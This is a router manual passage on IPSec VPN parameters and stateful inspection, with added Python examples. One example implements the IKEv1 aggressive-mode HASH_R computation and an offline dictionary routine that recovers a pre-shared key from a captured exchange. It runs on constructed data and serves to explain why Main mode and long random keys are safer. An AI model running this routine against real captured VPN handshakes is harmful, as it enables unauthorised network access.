Parameter Descriptions
The following tables describe SafeHarbour’s parameters that are used for an IPSec VPN
tunnel configuration:
Table 2: IPSec Configuration page parameters

Name: The name of the configured tunnel, used mainly as an identifier for the administrator. The value is ASCII and is limited to 31 characters. The tunnel name does not need to match the peer gateway.

Peer External IP Address: The public (routable) IP address of the remote gateway or VPN server you are establishing the tunnel with.

Encryption Protocol: The encryption protocol for the tunnel session. Supported values are NONE and ESP.

Authentication Protocol: The authentication protocol for the IP packet header. The three supported values are None, Encapsulating Security Payload (ESP) and Authentication Header (AH). Note that encryption with no authentication protects confidentiality only: without an integrity check the peer cannot detect packets that were modified in transit, so pair ESP encryption with ESP or AH authentication unless the peer cannot support it.

Key Management: The key management protocol manages the exchange of security keys in the IPSec protocol architecture. SafeHarbour supports the standard Internet Key Exchange (IKE).
Table 3: IPSec Tunnel Details page parameters

Name: The name of the configured tunnel, used mainly as an identifier for the administrator. The value is ASCII and is limited to 31 characters. The tunnel name does not need to match the peer gateway.

Peer Internal Network: The private, or Local Area Network (LAN), address of the remote gateway or VPN server you are communicating with.

Peer Internal Netmask: The subnet mask of the Peer Internal Network.

NAT enable: Turns NAT on or off for this tunnel.
Security
PAT Address: If NAT is enabled, this field appears. You can specify a Port Address Translation (PAT) address or leave the default all-zeroes (if Xauth is enabled). If you leave the default, the address will be requested from the remote router and dynamically applied to the Gateway.

Negotiation Method: The method used during the Phase 1 key exchange, or IKE process. SafeHarbour supports Main or Aggressive mode. Main mode requires three two-way exchanges (six messages), while Aggressive mode requires only three messages in total. Aggressive mode is quicker because the identities and the authentication hash are sent before any encryption is in place; with pre-shared-key authentication this means a hash derived from the PSK crosses the network in the clear and can be attacked offline by guessing. Use Main mode where the peer supports it; if Aggressive mode is required, use a long random pre-shared key.

Local ID Type: If Aggressive mode is selected as the Negotiation Method, this option appears. Selection options are: IP Address, Subnet, Hostname, ASCII.

Local ID Address/Value: If Aggressive mode is selected as the Negotiation Method, this field appears. This is the local (Gateway-side) IP address (or the name value, if Subnet or Hostname is selected as the Local ID Type).

Local ID Mask: If Aggressive mode is selected as the Negotiation Method, and Subnet as the Local ID Type, this field appears. This is the local (Gateway-side) subnet mask.

Remote ID Type: If Aggressive mode is selected as the Negotiation Method, this option appears. Selection options are: IP Address, Subnet, Hostname, ASCII.

Remote ID Address/Value: If Aggressive mode is selected as the Negotiation Method, this field appears. This is the remote (central-office-side) IP address (or the name value, if Subnet or Hostname is selected as the Remote ID Type).

Remote ID Mask: If Aggressive mode is selected as the Negotiation Method, and Subnet as the Remote ID Type, this field appears. This is the remote (central-office-side) subnet mask.

Pre-Shared Key Type: Classifies the Pre-Shared Key. SafeHarbour supports ASCII or HEX types.

Pre-Shared Key: The Pre-Shared Key is used to authenticate each side to the other, so both peers must be configured with the same value. The value can be ASCII or hex and at most 64 characters. ASCII is case-sensitive.

DH Group: Diffie-Hellman is a public key agreement algorithm that lets two systems derive a shared secret over an untrusted network; the secret is then used to derive the keys used for encryption. Groups 1, 2 and 5 are supported (768-, 1024- and 1536-bit MODP groups respectively). Group 1 is too small to resist a well-resourced attacker; choose the largest group the peer supports.

PFS Enable: Perfect Forward Secrecy (PFS) is used during SA renegotiation. When PFS is selected, a fresh Diffie-Hellman exchange is performed for each rekey, so compromise of one SA's keys does not expose the keys of earlier or later SAs. If enabled, the PFS DH group follows the IKE Phase 1 DH group.

SA Encrypt Type: The symmetric encryption algorithm used to encrypt each data packet. Supported values are DES and 3DES. DES uses a 56-bit key and can be brute-forced with modest resources; use 3DES.
SA Hash Type: The authentication hash algorithm used during SA negotiation. Supported values are MD5 and SHA1; SHA1 is the stronger of the two. N/A is displayed if NONE is chosen for the Authentication Protocol.

Invalid SPI Recovery: Enabling this allows the Gateway to re-establish the tunnel if either the Netopia Gateway or the peer gateway is rebooted.

Soft MBytes: Forces renegotiation of the IPSec Security Associations (SAs) once the configured amount of data traffic has passed through the tunnel. The value can be configured between 1 and 1,000,000 MB. The soft limit starts a rekey while the existing SA is still usable; if renegotiation does not succeed, the Hard MBytes limit is enforced, so the soft value should be lower than the hard value. This parameter does not need to match the peer gateway.

Soft Seconds: Forces renegotiation of the IPSec SAs once the configured number of seconds has elapsed. The value can be configured between 60 and 1,000,000 seconds and should be lower than Hard Seconds. This parameter does not need to match the peer gateway.

Hard MBytes: Expires the IPSec SAs once the configured amount of data traffic has passed, forcing a full renegotiation. The value can be configured between 1 and 1,000,000 MB. This parameter does not need to match the peer gateway.

Hard Seconds: Expires the IPSec SAs once the configured number of seconds has elapsed, forcing a full renegotiation. The value can be configured between 60 and 1,000,000 seconds. This parameter does not need to match the peer gateway.

IPSec MTU: Some ISPs require a setting such as 1492 (or another value). The default of 1500 is the most common and you usually do not need to change it unless otherwise instructed. Accepted values are from 100 to 1500. This is the starting MTU used when the IPSec tunnel is installed: it specifies the maximum IP packet length for the encapsulated AH or ESP packets sent by the router. The MTU used on the IPSec connection is adjusted automatically from the MTU value carried in any received ICMP "fragmentation needed" (can't fragment) error messages that correspond to IPSec traffic initiated from the router. Normally the MTU only requires manual configuration if those ICMP error messages are blocked or otherwise not received by the router; in that case path MTU discovery fails silently and large packets are dropped, so lower the value by hand.
Xauth Enable: Extended Authentication (XAuth) is an extension to the Internet Key Exchange (IKE) protocol. It adds a second authentication step when a remote user's Netopia Gateway establishes a VPN, authorizing network access to the user's central office. IKE establishes the tunnel, and XAuth authenticates the specific remote user's Gateway. Since NAT is supported over the tunnel, the remote user network can have multiple PCs behind the client Gateway accessing the VPN. By using XAuth, network VPN managers can centrally control remote user authentication.

Xauth Username/Password: XAuth authentication credentials.
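Why the Negotiation Method and Pre-Shared Key entries above matter together, as an added example that is not part of the original manual or of Netopia's software: in IKEv1 Aggressive mode the responder's HASH_R is sent in message 2 before any encryption exists, so anyone who captures the exchange can test candidate pre-shared keys against it offline. The cookies, nonces, DH public values and SA payload below are constructed stand-ins for fields read off the wire, and the PSK, identity and wordlist are made up for the demonstration.

```python
"""IKEv1 aggressive mode with pre-shared-key authentication: the HASH_R
construction from RFC 2409 and an offline guess against it.

Illustration only (not Netopia code). Every "captured" field is a
constructed stand-in; real DH values would be g^x mod p for the group.
"""
import hashlib
import hmac


def prf(key: bytes, data: bytes, hash_name: str = "sha1") -> bytes:
    """IKEv1 prf = HMAC with the negotiated hash (MD5 or SHA1 here)."""
    return hmac.new(key, data, getattr(hashlib, hash_name)).digest()


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes, hash_name: str = "sha1") -> bytes:
    """RFC 2409 5.4: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni + nr, hash_name)


def hash_r(psk: bytes, ex: dict, hash_name: str = "sha1") -> bytes:
    """RFC 2409 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    In aggressive mode this value is sent in the clear in message 2."""
    skeyid = skeyid_psk(psk, ex["ni"], ex["nr"], hash_name)
    data = (ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
            + ex["sai_b"] + ex["idir_b"])
    return prf(skeyid, data, hash_name)


def _blob(label: str, length: int) -> bytes:
    """Deterministic constructed bytes standing in for a captured field."""
    return hashlib.sha256(label.encode()).digest()[:length]


def captured_exchange() -> dict:
    """Constructed sample of what a passive observer sees in messages 1
    and 2 of an aggressive-mode exchange (lengths roughly match DH group 2)."""
    return {
        "cky_i": _blob("initiator cookie", 8),
        "cky_r": _blob("responder cookie", 8),
        "ni": _blob("initiator nonce", 20),
        "nr": _blob("responder nonce", 20),
        "gxi": _blob("initiator DH public value", 128),
        "gxr": _blob("responder DH public value", 128),
        "sai_b": _blob("initiator ISAKMP SA payload body", 40),
        # ID payload body: ID_IPV4_ADDR (1), protocol 0, port 0, then 192.0.2.1
        "idir_b": bytes([1, 0, 0, 0]) + bytes([192, 0, 2, 1]),
    }


def recover_psk(ex: dict, observed_hash_r: bytes, wordlist, hash_name: str = "sha1"):
    """Offline dictionary guess: recompute HASH_R per candidate and compare.
    Returns the matching candidate, or None if no word in the list matches."""
    for cand in wordlist:
        if hmac.compare_digest(hash_r(cand.encode(), ex, hash_name), observed_hash_r):
            return cand
    return None


# Made-up wordlist; a real attacker would use millions of candidates.
WORDLIST = ["password", "letmein", "Summer2005", "netopia1", "vpnkey!"]


def demo(true_psk: str = "netopia1"):
    """Responder computes HASH_R with the real PSK; the observer guesses it."""
    ex = captured_exchange()
    observed = hash_r(true_psk.encode(), ex)
    return recover_psk(ex, observed, WORDLIST)


if __name__ == "__main__":
    print("weak PSK recovered:", demo())
    print("random 64-char hex PSK:", demo(hashlib.sha256(b"seed").hexdigest()))
```

The only defence the observer cannot get around is the size of the key space: a 64-character random hex key (the maximum this gateway accepts) is out of reach of any wordlist, whereas a dictionary word falls immediately. Main mode does not expose HASH_R in the clear at all, which is why it is the safer choice when the peer supports it.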
Stateful Inspection
All computer operating systems are vulnerable to attack from outside sources, typically at the operating system or Internet Protocol (IP) layers. Stateful Inspection firewalls intercept and analyze incoming data packets to determine, on multiple criteria, whether they should be admitted to your private LAN or blocked. Stateful inspection improves security by tracking data packets over a period of time, examining both incoming and outgoing packets. Outgoing packets that request specific types of incoming packets are tracked; only those incoming packets constituting a proper response are allowed through the firewall.

Stateful inspection prevents unsolicited inbound access even when NAT is disabled (with NAT enabled, an inbound packet that matches no translation entry is already dropped). You can configure UDP and TCP "no-activity" periods, which also apply to NAT time-outs if stateful inspection is enabled on the interface. Stateful Inspection parameters are active on a WAN interface only if the feature is enabled on your Gateway. Stateful inspection can be enabled on a WAN interface whether NAT is enabled or not.
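The tracking behaviour described above, as an added example that is not the Gateway's own code: a minimal connection tracker that remembers flows a LAN host initiated and admits an inbound packet only if it is the reverse of a tracked flow that has not exceeded its no-activity period. The addresses, ports, timeouts and packet sequence are constructed for the demonstration.

```python
"""Stateful inspection in miniature (illustration, not Netopia code).

Outbound packets from the LAN create or refresh a flow entry; inbound
packets are allowed only when they match an existing entry. Entries age
out after a per-protocol idle period, mirroring the configurable UDP and
TCP "no-activity" time-outs.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    proto: str      # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    inbound: bool   # True if the packet arrives on the WAN interface


class StatefulInspector:
    def __init__(self, tcp_idle: int = 3600, udp_idle: int = 60):
        # Constructed idle periods in seconds, per protocol.
        self.idle = {"tcp": tcp_idle, "udp": udp_idle}
        # flow key (proto, lan_ip, lan_port, wan_ip, wan_port) -> last activity time
        self.table = {}

    def _key(self, p: Packet):
        """Normalise both directions of a flow to the same LAN-side key."""
        if p.inbound:
            return (p.proto, p.dst, p.dport, p.src, p.sport)
        return (p.proto, p.src, p.sport, p.dst, p.dport)

    def _expire(self, now: int) -> None:
        """Drop entries whose no-activity period has elapsed."""
        dead = [k for k, t in self.table.items() if now - t > self.idle[k[0]]]
        for k in dead:
            del self.table[k]

    def handle(self, p: Packet, now: int) -> str:
        """Return "allow" or "drop" for one packet seen at time `now`."""
        self._expire(now)
        k = self._key(p)
        if not p.inbound:
            self.table[k] = now          # LAN host started or continued a flow
            return "allow"
        if k in self.table:
            self.table[k] = now          # proper response to a tracked flow
            return "allow"
        return "drop"                    # unsolicited inbound packet


def demo():
    """Constructed packet sequence; returns the verdict for each packet."""
    fw = StatefulInspector(tcp_idle=3600, udp_idle=60)
    lan, dns, attacker = "192.168.1.10", "198.51.100.53", "203.0.113.7"
    events = [
        (0, Packet("udp", lan, 40000, dns, 53, False)),        # DNS query out
        (1, Packet("udp", dns, 53, lan, 40000, True)),         # matching answer
        (2, Packet("tcp", attacker, 4444, lan, 445, True)),    # unsolicited probe
        (3, Packet("udp", dns, 53, lan, 40001, True)),         # wrong port: no match
        (100, Packet("udp", dns, 53, lan, 40000, True)),       # answer after UDP idle
    ]
    return [fw.handle(p, t) for t, p in events]


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

The last packet shows why the no-activity period matters: the DNS entry was refreshed at t=1 and the UDP idle period is 60 s, so a reply arriving at t=100 is treated as unsolicited even though it comes from the right peer and port. A real firewall also validates TCP flags and sequence numbers; this tracker keys on the 5-tuple only.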
Stateful Inspection Firewall installation procedure
NOTE: Installing Stateful Inspection Firewall is mandatory to comply with Required Services Security Policy - Residential Category module - Version 4.0 (specified by ICSA Labs). For more information please go to the following URL:
http://www.icsalabs.com/html/communities/firewalls/certification/criteria/Residential.pdf
1. Access the router through the web interface from the private LAN. The DHCP server is enabled on the LAN by default.

2. The Gateway's Stateful Inspection feature must be enabled in order to block unsolicited TCP, UDP and ICMP packets destined for the router or the private hosts. This can be done by navigating to Expert Mode -> Security -> Stateful Inspection.